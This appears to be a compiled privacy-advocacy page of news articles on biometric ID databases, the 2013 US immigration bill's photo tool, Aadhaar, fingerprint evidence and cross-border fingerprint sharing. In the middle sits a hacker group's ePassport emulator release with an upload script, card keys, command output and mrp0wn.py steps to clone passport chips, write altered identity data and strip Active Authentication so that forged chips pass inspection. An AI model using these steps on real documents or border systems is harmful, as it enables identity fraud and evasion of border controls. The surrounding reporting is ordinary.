Submitted by sosadmin on Fri, 05/10/2013 – 13:34

We’ve been warning for some time about the stealth creation of federal databases containing the biometric identifiers of millions of people, as well as the federal government’s use of state registry of motor vehicle databases as pools from which to harvest driver ID photos at will.

But a proposal in the new bipartisan immigration bill makes even the FBI’s spooky Next Generation Identification database and its “Project Facemask” seem like 20th century card catalogues. Wired reports:

The immigration reform measure the Senate began debating yesterday would create a national biometric database of virtually every adult in the U.S., in what privacy groups fear could be the first step to a ubiquitous national identification system.

Buried in the more than 800 pages of the bipartisan legislation (.pdf) is language mandating the creation of the innocuously-named “photo tool,” a massive federal database administered by the Department of Homeland Security and containing names, ages, Social Security numbers and photographs of everyone in the country with a driver’s license or other state-issued photo ID.

Employers would be obliged to look up every new hire in the database to verify that they match their photo.

Sounds like an ambitious project that will likely cost a lot of money, and probably severely impact civil liberties.

But does face recognition even work? At present, not very well, even in highly controlled environments.

A Boston Globe report from 2011 found that face recognition software deployed at the Massachusetts Registry of Motor Vehicles misidentifies about 1,000 people per year, causing pretty substantial inconvenience for them. Multiple that figure by 50 and you’ve got a likely figure for misfires if such a system goes federal.

What’s the big deal, though? If the registry of motor vehicles denies you a license renewal for a couple weeks while you fix the errors, it’s a pain, though clearly not the worst thing in the world.

But what if the inconvenience became something much more serious? What if it meant you — or 50,000 other Americans each year — were denied employment and therefore lost your home to foreclosure, or fell behind on credit card bills and slumped into serious debt? Or worse, if the government started using this DHS biometric system for ‘security’ procedures, what if you were wrongfully arrested or even shot in a botched raid, a tragic case of mistaken identity?

In fact, advocates warn that, like the social security number, this tool could end up being used to track us in ways the creators of this supposedly ‘immigration-related’ system never intended.

Wired:

This piece of the Border Security, Economic Opportunity, and Immigration Modernization Act is aimed at curbing employment of undocumented immigrants. But privacy advocates fear the inevitable mission creep, ending with the proof of self being required at polling places, to rent a house, buy a gun, open a bank account, acquire credit, board a plane or even attend a sporting event or log on the internet. Think of it as a government version of Foursquare, with Big Brother cataloging every check-in.

“It starts to change the relationship between the citizen and state, you do have to get permission to do things,” said Chris Calabrese, a congressional lobbyist with the American Civil Liberties Union. “More fundamentally, it could be the start of keeping a record of all things.”

For now, the legislation allows the database to be used solely for employment purposes. But historically such limitations don’t last. The Social Security card, for example, was created to track your government retirement benefits. Now you need it to purchase health insurance.

An analyst at the Competitive Enterprise Institute told Wired that the proposed tracking system would be “like a national ID system without the card.”

No thanks.

The biometrics industry, meanwhile, is licking its chops. Analysts predict that the business will be worth $10 billion per year by 2018. The future beckons, and it’s looking more and more like Minority Report every day.

May. 10, 2013 10:04am Liz Klimas

A more than 800-page bill for immigration reform, which the Senate has begun debating, carries a measure privacy advocates worry could lead to the creation of a biometric database of every adult in the United States.

The section in the Border Security, Economic Opportunity, and Immigration Modernization Act called “Identity Authentication Mechanism,” which describes a “photo tool,” is what has some on alert.

The section states that an employer hoping to hire an individual would need to verify the identity of the said person “using the photo tool.” Such a tool would be developed and maintained by the Secretary of State allowing employers to “match the photo on a covered identity document provided to the employer to a photo maintained by a U.S. Citizenship and Immigration Services database.”

Wired has the perspective of privacy advocates regarding this measure:

But privacy advocates fear the inevitable mission creep, ending with the proof of self being required at polling places, to rent a house, buy a gun, open a bank account, acquire credit, board a plane or even attend a sporting event or log on the internet. Think of it as a government version of Foursquare, with Big Brother cataloging every check-in.
“It starts to change the relationship between the citizen and state, you do have to get permission to do things,” said Chris Calabrese, a congressional lobbyist with the American Civil Liberties Union. “More fundamentally, it could be the start of keeping a record of all things.”

David Bier, an analyst with the Competitive Enterprise Institute, agrees with the ACLU’s fears.
“The most worrying aspect is that this creates a principle of permission basically to do certain activities and it can be used to restrict activities,” he said. “It’s like a national ID system without the card.”
This isn’t the first time this year the biometric data measure has been discussed. Back in January when the framework was endorsed by Senate Majority Leader Harry Reid (D-Nev.), those believing the system could infringe upon civil liberties began voicing their discontent as well.

Committee Chairman Sen. Patrick Leahy (D-VT) (C) confers with Sen. John Cornyn (R-TX) (L) during Senate Judiciary Committee’s markup for the immigration reform bill on Capitol Hill May 9, 2013 in Washington, DC. The 18 members of the committee have proposed in excess of 300 amendments to the 844 page piece of legislation that would, if passed, create a path to U.S. citizenship for undocumented immigrants. Also pictured is Sen. Jeff Sessions (R-AL) (R). (Photo: Win McNamee/Getty Images)
USA Today also reported earlier this week that an amendment was proposed by Sen. Orrin Hatch (R-Utah) that would require biometric data be collected on foreigners leaving the country, a measure Homeland Security tried rather unsuccessfully to institute as a program at airports since 9/11. The amendment would require such a biometric exit data system be established at 10 of the U.S.’s core airports within two years of enactment. After five years, a study on the effectiveness of the system would then allow the appropriate program to be instituted at all 30 airports flying internationally.

“Biometric data provides the government with certainty that travelers (and not just their travel documents) have or have not left the country,” Hatch’s office stated.

USA Today went on to explain that the reason the exit data system hasn’t taken off in the past is due to its expense.

Earlier this year, TheBlaze reported that the Pentagon was already working with a company to create a biometric scanning attachment for smartphones.

The Obama administration is drafting a paper called the “National Strategy for Trusted Identities”, which investigates ways that web users can protect their online identities.

But Commerce Secretary Gary Locke was quick to reassure people that it wasn’t a guise for more big brother government.

Posted by Declan McCullagh (This story originally appeared on CNET)

STANFORD, Calif. – President Obama is planning to hand the U.S. Commerce Department authority over a forthcoming cybersecurity effort to create an Internet ID for Americans, a White House official said here today.

It’s “the absolute perfect spot in the U.S. government” to centralize efforts toward creating an “identity ecosystem” for the Internet, White House Cybersecurity Coordinator Howard Schmidt said.

That news, first reported by CNET, effectively pushes the department to the forefront of the issue, beating out other potential candidates including the National Security Agency and the Department of Homeland Security. The move also is likely to please privacy and civil liberties groups that have raised concerns in the past over the dual roles of police and intelligence agencies.

The announcement came at an event today at the Stanford Institute for Economic Policy Research, where U.S. Commerce Secretary Gary Locke and Schmidt spoke.

The Obama administration is currently drafting what it’s calling the National Strategy for Trusted Identities in Cyberspace, which Locke said will be released by the president in the next few months. (An early version was publicly released last summer.)

“We are not talking about a national ID card,” Locke said at the Stanford event. “We are not talking about a government-controlled system. What we are talking about is enhancing online security and privacy and reducing and perhaps even eliminating the need to memorize a dozen passwords, through creation and use of more trusted digital identities.”

The Commerce Department will be setting up a national program office to work on this project, Locke said.

Details about the “trusted identity” project are unusually scarce. Last year’s announcement referenced a possible forthcoming smart card or digital certificate that would prove that online users are who they say they are. These digital IDs would be offered to consumers by online vendors for financial transactions.

Schmidt stressed today that anonymity and pseudonymity will remain possible on the Internet. “I don’t have to get a credential if I don’t want to,” he said. There’s no chance that “a centralized database will emerge,” and “we need the private sector to lead the implementation of this,” he said.

Inter-agency rivalries to claim authority over cybersecurity have exited ever since many responsibilities were centralized in the Department of Homeland Security as part of its creation nine years ago. Three years ago, proposals were were circulating in Washington to transfer authority to the secretive NSA, which is part of the U.S. Defense Department.

In March 2009, Rod Beckstrom, director of Homeland Security’s National Cybersecurity Center, resigned through a letter that gave a rare public glimpse into the competition for budgetary dollars and cybersecurity authority. Beckstrom said at the time that the NSA “effectively controls DHS cyber efforts through detailees, technology insertions,” and has proposed moving some functions to the agency’s Fort Meade, Md., headquarters.

Students from the Indian Institute of Science and activists held placards and banners saying ‘Beware, Big Brother is watching you’ and ‘Secure electronic archive is a myth’ at the JRD Tata Auditorium of the National Institute of Advanced Studies.

Published: Saturday, Jan 8, 2011, 10:14 IST
By Hemanth CS | Place: Bangalore | Agency: DNA

A group of students and activists staged a silent protest on Friday opposing the 12-digit Aadhaar number as Unique Identification Authority of India (UIDAI) chairman Nandan Nilekani delivered a lecture on Aadhaar’s role in the transformation of public service delivery. Students from the Indian Institute of Science and activists held placards and banners saying‘Beware, Big Brother is watching you’ and ‘Secure electronic archive is a myth’ at the JRD Tata Auditorium of the National Institute of Advanced Studies.

The protesters also distributed hand-outs and newspaper articles opposing the Aadhaar number. A few protesters questioned Nilekani on the necessity of introducing the 12-digit number during the question and answer session which followed his hour-long lecture.

The protesters argued that Aadhaar was a violation of privacy and civil liberties of the people and it could be used for profiling individuals, especially from the minority community.

“During and after the 2002 Gujarat riots, Muslims were handpicked by the rioters and executed based on the data collected from the state identity card. The same thing could happen if Narendra Modi becomes the prime minister. Fundamentalists will use Aadhaar to identify minorities and kill them,” said Rajesh, a IISc student.

The protesters questioned Nilekani’s claim that Aadhaar was voluntary.

“A big myth is being propagated that Aadhaar is voluntary. UIDAI’s concept note stresses that enrollment will not be mandated. But there is a catch: benefits and services that are linked to the UID will ensure demand for the number,” said a protester.

They wondered whether the bio-metric technology adopted by UIDAI is capable of the task of de-duplication. The UIDAI has admitted that retaining biometric efficiency for a database of more than one billion people has not been adequately analysed and that the problem of fingerprint quality in India has not been studied in depth.

Replying to the allegations made on Aadhaar number, Nilekani said that in every country whenever there is an issue of national security, there is provision to access identity. In India, it would be no different.

“The government is thinking of providing national portability and looking at inclusive growth. In turn, it’s an opportunity for people to open bank accounts, have micro ATMs and mobile phones through the Aadhaar,” he said.

If Aadhaar number is made equal to the KYC (know-your-customer) for opening bank accounts, it would lead the way for financial inclusion. According to a survey, more than 80% of the population especially in the rural areas said that they wanted a bank account, he said.

A senior judge has raised concerns over fingerprint evidence used in criminal trials, warning that it rests on “assumptions” that have never been scientifically proven.

By Richard Edwards, Crime Correspondent 8:00AM GMT 19 Nov 2010

Lord Justice Leveson, an appeal judge and chairman of the Sentencing Council, called into question the “century old” identification process, which he said was often considered “virtually unassailable” in tying a person to a crime.

The judge said that there have been “numerous” recent cases of innocent people being wrongly singled out by fingerprint evidence.

In a speech to the Forensic Science Society in London, he said the analysis of fingerprints by experts was “fundamentally subjective” and that it was therefore “inherently capable of misidentifications”.

Lord Justice Leveson called for new research to be carried out to ensure fingerprinting is “robust” and reliable.

“There is growing unease among fingerprint examiners and researchers that the century old fingerprint identification process rests on assumptions that have never been tested empirically,” he said.

Speaking about the use of expert evidence in court cases, the senior judge said it was vital to have a “methodology and a hypothesis that are capable of withstanding robust testing”.

“Arguably, as it currently stands, the science of fingerprint identification does not,” he added.

The judge is the most senior member of the judiciary to speak out about the concerns, which have been raised by experts and academics for the past few years.

However it is unlikely to lead to a series of convicted criminals appealing their cases because in most instances where fingerprints are now used in court, the evidence is corroborated by other forensic samples such as DNA testing.

However examples of failings include Brandon Mayfield, who in 2004 was wrongly linked to the Madrid train bombings by FBI fingerprint experts in the United States.

Shirley McKie, a Scottish police officer, was wrongly accused of having been at a murder scene in 1997 after a print supposedly matching hers was found near the body.

Criminal fingerprinting techniques were pioneered at Scotland Yard at the beginning of the 20th century. The first successful conviction using them was of Harry Jackson, a burglar who was jailed in 1902.

No two fingerprints are ever exactly alike in every detail – even two impressions recorded immediately after each other from the same hand.

It requires an expert examiner to determine whether a print taken from a crime scene and one taken from a subject are likely to have originated from the same finger.

Unlike other forensic fields, such as DNA analysis, which give a statistical probability of a match, fingerprint examiners traditionally testify that the evidence constitutes either a 100 per cent certain match or a 100 per cent exclusion.

Lord Justice Leveson said: “The language of certainty that examiners are forced to use hides a great deal of uncertainty, which greatly undermines the examiners’ legitimacy.”

A recent study found that experts do not always make the same judgment on whether a print matches a mark at a crime scene, when presented with the same evidence twice.

Six examiners in several countries were given eight sets of prints to compare on two different occasions, without knowing it was past of a study. They changed their decision in six cases and only two of the experts were consistent with their previous decision.

The research, carried out at Southampton University, found they were more likely to change their decision if given contextual information, such as “the suspect has confessed”, that conflicted with their previous judgment.

BEAT THE CHIP

BEATTHECHIP.ORG IS DEVOTED TO PRESERVING US CITIZENS FROM THE PROGRESS OF REAL ID LEGISLATIONS

WEDNESDAY, NOVEMBER 25, 2009

c/o CanWest News Washington
WASHINGTON — Seeking to enhance its efforts to crack down on fraudulent refugee claims, the Harper government on Tuesday announced it has struck a deal to share fingerprint information on asylum seekers with the United States.

Public Safety Minister Peter Van Loan made the announcement following a bilateral summit here with U.S. Homeland Security Secretary Janet Napolitano.

Under the protocol, the U.S. will join a biometric data-sharing initiative Canada had already launched last summer with the United Kingdom and Australia.

“Biometrics continue to be a powerful tool to prevent terrorists and criminals from crossing our shared border and preventing identity theft and asylum fraud,” Napolitano said at a news conference with Van Loan.

Canada’s privacy commissioner, Jennifer Stoddart, had expressed a series of concerns about the biometric data sharing when the plan was first announced in August. Stoddart’s office questioned Ottawa about the need to collect fingerprints and sought assurances the personal information gathered would not be used for secondary purposes.

“While we are still reviewing their response, on the surface of it, it appears they have addressed most of our concerns,” said Anne-Marie Hayden, a spokesperson for the privacy commissioner.

“They have advised us that under the protocol, biometric information will only be used for immigration and nationality issues. They have also told us that biometric matching information will only be one of many elements considered when assessing a file.”

The privacy commissioner’s office is still awaiting a response, however, on how Citizenship and Immigration Canada “plans to address our concerns about how refugees, a very vulnerable population, will be notified about the collection and use of their biometric information,” Hayden said.

Napolitano said the U.S. will dispatch its chief privacy officer to Ottawa in early December for discussions with Canadian officials. “As we share information, we are committed to protecting privacy and civil rights,” she said.

Immigration Minister Jason Kenney has argued biometric data sharing on refugee claimants dramatically increases the government’s ability to identify foreign nationals who try to hide their past when seeking to enter Canada.
His office says the agreement allows countries to check each other’s fingerprint databases but doesn’t give them unfettered access to the information.

“Previous trials show that biometric information sharing works,” Kenney said in a statement Tuesday. “The data sharing helps uncover details about refugee claimants such as identity, nationality, criminality, travel and immigration history, all of which can prove relevant to the claim.”

When Canada, the U.K. and Australia initially signed the agreement last summer, they sought to allay privacy concerns by agreeing no central database of fingerprints would be created.

The information-sharing pact is part of a broader government initiative to introduce biometrics into Canada’s immigration and refugee screening system — a plan that continues to raise red flags for privacy advocates.

“We have made them aware of our concerns with respect to what seems to be a general trend toward an increased collection of biometric information,” Hayden said.

THC/vonJeek proudly presents an ePassport emulator. This emulator applet
allows you to create a backup of your own passport chip(s).


The government plans to use ePassports at Immigration and Border
Control. The information is electronically read from the Passport
and displayed to a Border Control Officer or used by an automated
setup. THC has discovered weaknesses in the system to (by)pass the
security checks. The detection of fake passport chips does not
work. Test setups do not raise alerts when a modified chip
is used. This enables an attacker to create a Passport with an
altered Picture, Name, DoB, Nationality and other credentials.

The manipulated information is displayed without any alarms going off.
The exploitation of this loophole is trivial and can be verified using
thc-epassport.

Regardless how good the intention of the government might have been, the
facts are that tested implementations of the ePassports Inspection System
are not secure.

ePassports give us a false sense of security: We are made to believe
that they make usemore secure. I'm afraid that's not true: current
ePassport implementations don't add security at all.

Thanks to Elv1s for beta testing!

Just follow two easy steps:

(1) Upload the emulator code to a blank JCOP v4.1 72k smart card
Use your favorite tool to upload the CAP file. As an example GPShell is
used. The script used to upload the CAP file:

P:\GPShell-1.4.2>type epassport.script
mode_211
enable_trace
establish_context
// edit the following line to match your PCSC reader
card_connect -readerNumber 3
select -AID A000000003000000
open_sc -security 3 -mac_key 404142434445464748494A4B4C4D4E4F -enc_key 404142434445464748494A4B4C4D4E4F -kek_key 404142434445464748494A4B4C4D4E4F
delete -AID A00000024710
install -file epassport.cap -priv 2
card_disconnect
release_context

A sample output of an actual upload:

P:\GPShell-1.4.2>GPShell.exe epassport.script
mode_211
enable_trace
establish_context
card_connect -readerNumber 3
* reader name OMNIKEY CardMan 5x21-CL 0
select -AID a000000003000000
Command --> 00A4040008A000000003000000
Wrapped command --> 00A4040008A000000003000000
Response <-- 6F108408A000000003000000A5049F6501FF9000
..
..
..
Wrapped command --> 84E60C002506A0000002471007A000000247100107A00000024710010100
02C90000B918E8E43A25117700
Response <-- 9000
card_disconnect
release_context

The CAP file currently supports the following files:

 * EF.COM :    32 bytes (required file)
 * EF.SOD :  2560 bytes (required file)
 * EF.DG1 :    96 bytes (required file)
 * EF.DG2 : 24576 bytes (required file)
 * EF.DG11:    64 bytes (optional, e.g. USA)
 * EF.DG12:    96 bytes (optional, e.g. USA)
 * EF.DG13:    96 bytes (optional, e.g. Japan, France)
 * EF.DG15:   192 bytes (optional, e.g. The Netherlands)

If you need support for other / larger DGs, please let vonJeek know.

(2a) Clone the chip
Using a customized THC version of Adam Laurie's RFIDIOt tools, you're able
to read a chip's content and to write it to an emulator.

P:\RFIDIOt-vonjeek>mrp0wn.py CLONE M3V0NJ33K000000999999

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek <mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Put a ePassport near the terminal and press enter to continue...
Reading document using KEY M3V0NJ33K000000999999, please be patient...
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.

Done, happy mrp0wning  

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

If your chip is protected using the optional Active Authentication mechanism,
the Active Authentication data group (DG15, tag 0x6F) is removed from EF.COM
as demonstrated by Jeroen van Beek at the 2008 USA BlackHat Briefings. Note
that mrp0wn.py's parameter 'STRIP_AA' must be set to the value 'True'. This
attack will work on all inspection system implementations that are using e.g.
ICAO's "worked examples", see this site for more info on that.

(2b) Write saved data
It's also possible to write chip data you've saved earlier using RFIDIOt's
mrpkey.py. As an example you can use vonJeek's ePassport data. Note that
this data is self-signed: vonJeek started his own country  

P:\tmp>unzip vonjeek-epassport_dump.zip
Archive:  vonjeek-epassport_dump.zip
 extracting: EF_COM.BIN
  inflating: EF_DG2.BIN
  inflating: EF_DG1.BIN
 extracting: EF_SOD.BIN 

P:\>cd \RFIDIOt-vonjeek 

P:\RFIDIOt-vonjeek>mrp0wn.py WRITE /tmp

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek ;lt;mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Document type is PASSPORT.
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.
Done, happy mrp0wning  

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

You can also alter data before writing it to an emulator chip. If you want
to do that: this document contains details about - amongst others - DG1 and
DG2 encoding. If you've updated the DGs you can sign them using Peter
Gutmann's CryptLib. 

A read-out of vonJeek's ePassport chip using the reference implementation
named Golden Reader Tool can be seen below.

If you're interested in ePassport related PKI (how to verify whether chip
content is signed by a bonafide authority?) please check the following URLs:

* http://www2.icao.int/en/MRTD/Pages/icaoPKD.aspx
* http://www.icao.int/icao/en/atb/meetings/2008/TagMRTD18/TagMrtd18_ip04.pdf
* http://www.csca-si.gov.si/TR-PKI_mrtds_ICC_read-only_access_v1_1.pdf
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467106.ece
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467098.ece 

Yours sincerly,

vonjeek [at] thc dot org
The Hackers Choice

http://www.thc.org

By Swati Prasad, ZDNet Asia – Friday, September 25, 2009 04:59 PM

NEW DELHI–The need for standards and concerns over security and privacy were highlighted this week, as the Indian government prepares to roll out various e-government projects based on biometrics.

“The industry, government and academia need to collaborate to evolve standards for biometrics,” Nandita Jain Mahajan, IBM’s India South chief privacy and information security office, said during the India Preparatory Meeting: Biometrics and Data Protection, held here Thursday. The two-day event was organized by the Data Security Council of India, a self-regulatory organization led by Nasscom.
According Mahajan, the Indian government should adopt open standards to avoid heavy dependence on one technology vendor.
The country is in the process of deploying biometric cards for various e-government schemes, including the national unique identity card and e-passport projects.
“No government wants to be locked into any one technology,” S. K. Sinha, senior director of National Informatics Centre (NIC), said during a panel discussion, adding that India has put much emphasis on standardization for the technology.
“The Indian government is working on a national standard for biometrics [and] wants to have a technology standard that is open and provides a level-playing field so that many vendors can take part,” Sinha said. However, he noted that standards should be established such that they can widely adopted by the industry. “Standards should be implementable,” he said.

Are biometric cards privacy-compatible?
According to Shree Parthasarthy, a director at Deloitte said biometrics is “as old as forensics”, taking into account several factors such as the iris scan, finger prints, appearance, social behavior, skull measurement, voice, and so on. “It’s impossible to replicate or mimic all of these characteristics,” Parthasarthy noted.
And while biometric cards offer better security, he noted that there are several primary concerns over the use of such cards, including questions about privacy protection, misuse of biometric data and how biometrics will support privacy policies.
According to Mahajan, there are three technology components in biometrics: acquisition, extraction and matcher. Often, all attributes of biometric cards do not match and the acceptability error rates can be high, he said.
“If your password is compromised, you can change it, but if your biometrics is compromised, what can you do about it,” he questioned.
Y. D. Wadaskar, managing director of Pune-based IT security products company, WYSE Biometrics Systems, said: “Every individual is unique and therefore, biometrics and privacy go hand in hand. We need to trust these cards just as we trust our doctors and lawyers when we share personal information with them.”
Sunil Dhaka, chief information security officer of ICICI Bank, said the bank has been successful in implementing biometric cards for agriculture-based banking in rural areas.
“Since rural India has no Internet or tele-banking facility, we realized the solution had to be online-offline ready,” Dhaka said. “With such cards, we can do banking at the speed of thought.”

One billion ID cards challenge
Zia Saquib, executive director of Centre for Development of Advanced Computing (C-DAC), who also attended the meet, noted that deploying biometric cards for citizens in New York is different from implementing similar schemes in rural India. C-DAC develops applications for e-government projects.
According to Saquib, data collection and enrolment in rural areas can prove a challenge as “identification is a sensitive issue,” he said.
“We need to have strong authentication processes in place at the time of enrolment, he explained, adding that biometric data must not be stored in the same place as personal data.”
Biometric data must be stored locally,” he said. Saquib also highlighted the benefits of using digital rights management methodology for biometrics, giving users access to information only on a “need to know” basis.
Sinha said generating over 1 billion national unique ID cards cannot be done with small number of stakeholders. “You need different stakeholders for enrolment, creation of database, generating algorithms, verifying and distributing these cards,” he added.
“And when you have so many stakeholders, the need for standards becomes all the more critical,” he noted. Asked how the government plans to address privacy and security concerns over biometric cards, he said it is still too early to provide comments.
Sinha said: “All we can say is that the data will be highly protected and we will put several cyber-controls and encryptions in place, in both online and offline mode.”
Swati Prasad is a freelance IT writer based in India.